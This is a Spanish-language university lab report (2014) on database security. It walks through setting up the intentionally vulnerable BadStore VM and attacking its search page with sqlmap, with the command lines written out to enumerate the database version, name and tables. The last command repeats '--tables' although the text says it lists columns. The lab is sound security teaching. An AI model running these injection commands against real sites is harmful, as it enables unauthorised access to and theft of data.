View
60
Download
0
Category
Preview:
Citation preview
SEGURIDAD EN BASE DE DATOSPRACTICA 1
Realizada porDoris E. Jojoa Paz
Escuela de Ciencias Básicas, Tecnología e Ingeniería “ECBTI”, Universidad Nacional Abierta y a Distancia “UNAD”
2014
Instalación de la máquina virtual Virtual box.
Descarga BadStore.
Descarga de SQLMA (http://sqlmap.org/) programa para realizar ataque por inyección de código SQL
Ataque a la base de datos de Badstore, obteniendo información sobre la base de datos(servidor de BD y versión, nombre de la base de datos, nombre de las tablas, etc.
Instalación de la máquina virtual Virtual box
Oracle VM VirtualBox
es un software de virtualización para arquitecturas x86/amd64, que permite instalar sistemas operativos adicionales, conocidos como «sistemas invitados», dentro de otro sistema operativo «anfitrión», cada uno con su propio ambiente virtual.
Después de descargarlo de http://www.oracle.com/. Se procede a su instalación la cual es muy sencilla. A continuación se indican las pantallas más relevantes de su instalación.
Una vez instalado virtualbox , también se ejecuta un paquete de extensión de virtualbox para complementar su funcionabilidad
DESCARGA LA BASE DE DATOS DE BADSTORE Y CONFIGURACIÓN.
Posteriormente, instalado virtualbox, se procede a su configuración y carga de la base de datos de Badstore que se descargó previamente de www.badstore.net ( se debe dar clic en el apartado que dice descargar demo para acceder a ella). Las siguientes pantallas indican la secuencia realizada para tal efecto.
12 3
4
Una vez termina la carga y configuración de Badstore, se procede a iniciar la máquina virtual, mediante el comando ifconfig, se logra visualizar Ip de la base de datos registrada 192.168.0.118 , esta dirección se ubica en el navegador para acceder a Badstore.
ATAQUE POR INYECCIÓN DE CÓDIGO SQL UTILIZANDO SQLMAP
SQLMAP se obtiene de http://sqlmap.org/ , pero para su ejecución requiere de la instalación de Python. Las carpetas que contienen los archivos de SQLMAP como de Python debe estar en la misma unidad para que funcionen adecuadamente.
ATAQUE A LA BASE DE DATOS DE BADSTORE
Para obtener información sobre la base de datos de Badstore, ingresamos a CMD, donde se listan sus directorios y a partir de sqlmap.py se ingresan las líneas correspondientes para ver información de la base de datos, como versión, tablas entre otras.
Las siguientes pantallas muestran información de la base datos.
Mediante la siguiente línea :
sqlmap.py -u "http://192.168.0.118/c
gi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" –b
se observa: Conexión a la base de
datos y la versión
Mediante la línea: sqlmap.py -u
"http://192.168.0.118/cgi-bin/badstore.
cgi?searchquery=hi&action=search&x=0&y=
0" --current-dbSe observa el
nombre de la base de datos
Mediante la línea: sqlmap.py -u
"http://192.168.0.118/cgi-bin/badstore.
cgi?searchquery=hi&action=search&x=0&y=
0" --tables -D badstoredb
Se observan las tablas de la base de
datos
Mediante la línea: sqlmap.py -u
"http://192.168.0.118/cgi-bin/badstore.
cgi?searchquery=hi&action=search&x=0&y=
0" --tables -D badstoredb
Se observan las columnas de la base
de datos. Y asi con diferentes
parametros se pueden extraer
datos del contenido de las tablas entre
otros.
ReferenciasTutorial - Manual SQLmap: ataques SQLi - Inyección SQL. Recuperado el 27 de septiembre de 2014 de: http://blog.elhacker.net/2014/06/sqlmap-automatizando-ataques-sqli-injection.html
http://www.oracle.com/technetwork/es/server-storage/virtualbox/downloads/index.html#vbox
http://sqlmap.org/
Descargar y usar SQLmap en Windows (Anonymous Cooperación Ciberactivista Global).(2/09/2012). Recuperado el 27 de septiembre de 2014 de: http://www.youtube.com/watch?feature=player_embedded&v=_wwYuilkn8M
Recommended